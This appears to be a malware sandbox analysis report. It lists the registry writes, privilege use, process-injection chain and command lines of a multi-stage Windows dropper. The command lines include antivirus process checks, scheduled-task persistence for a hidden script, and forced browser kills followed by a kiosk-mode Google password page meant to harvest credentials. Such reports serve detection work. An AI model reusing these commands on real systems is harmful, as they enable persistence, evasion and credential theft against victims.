0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012580001\af361a9bea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012581001\7f22d62c97.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\5a603220f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\5a603220f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\5a603220f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012584001\c6a49f0ee6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012584001\c6a49f0ee6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2788 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2788 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2788 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2788 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2892 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2892 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2892 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2892 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2892 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2892 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2892 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 1492 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp
PID 1492 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp
PID 1492 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp
PID 1492 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp
PID 1492 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp
PID 1492 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp
PID 1492 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp
PID 2784 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 2784 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 2784 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 2784 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 1084 wrote to memory of 2012 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1084 wrote to memory of 2012 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1084 wrote to memory of 2012 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1084 wrote to memory of 2012 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2892 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2892 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2892 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2892 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2244 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1680 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1680 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1680 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1680 wrote to memory of 580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1680 wrote to memory of 580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1680 wrote to memory of 580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1680 wrote to memory of 580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1680 wrote to memory of 2432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1680 wrote to memory of 2432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1680 wrote to memory of 2432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1680 wrote to memory of 2432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1680 wrote to memory of 2476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1680 wrote to memory of 2476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1680 wrote to memory of 2476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1680 wrote to memory of 2476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1680 wrote to memory of 1232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 1232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 1232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 1232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 1680 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe

"C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

"C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp

"C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp" /SL5="$60016,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause raf_encoder_1252

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

"C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause raf_encoder_1252

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 491505

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B

C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Dr.com B

C:\Windows\SysWOW64\choice.exe

choice /d y /t 15

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Users\Admin\AppData\Local\Temp\1012580001\af361a9bea.exe

"C:\Users\Admin\AppData\Local\Temp\1012580001\af361a9bea.exe"

C:\Users\Admin\AppData\Local\Temp\1012581001\7f22d62c97.exe

"C:\Users\Admin\AppData\Local\Temp\1012581001\7f22d62c97.exe"

C:\Users\Admin\AppData\Local\Temp\1012582001\5a603220f9.exe

"C:\Users\Admin\AppData\Local\Temp\1012582001\5a603220f9.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1612.0.131886831\42023252" -parentBuildID 20221007134813 -prefsHandle 1276 -prefMapHandle 1268 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6351a742-5eaa-4491-8d15-392953d52ebf} 1612 "\\.\pipe\gecko-crash-server-pipe.1612" 1340 44f4158 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1612.1.2130270721\1469106561" -parentBuildID 20221007134813 -prefsHandle 1528 -prefMapHandle 1524 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f18b0e8b-59ae-4fb6-9a63-42033bfc7d87} 1612 "\\.\pipe\gecko-crash-server-pipe.1612" 1556 4406858 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1612.2.1313743205\1031796921" -childID 1 -isForBrowser -prefsHandle 2004 -prefMapHandle 2000 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 716 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b48434c4-f5b1-4db5-bcbe-c8edcd133140} 1612 "\\.\pipe\gecko-crash-server-pipe.1612" 2016 19b66758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1612.3.1773498898\1459404104" -childID 2 -isForBrowser -prefsHandle 2872 -prefMapHandle 2868 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 716 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90d7bf9b-933d-4ab0-9c60-f75d5868539a} 1612 "\\.\pipe\gecko-crash-server-pipe.1612" 2884 17e5fe58 tab

C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe

"C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1612.4.1480152191\1001270743" -childID 3 -isForBrowser -prefsHandle 3812 -prefMapHandle 3016 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 716 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cbc9d0a2-fed2-44f0-9a17-52808dcbcf5a} 1612 "\\.\pipe\gecko-crash-server-pipe.1612" 3800 20e2e258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

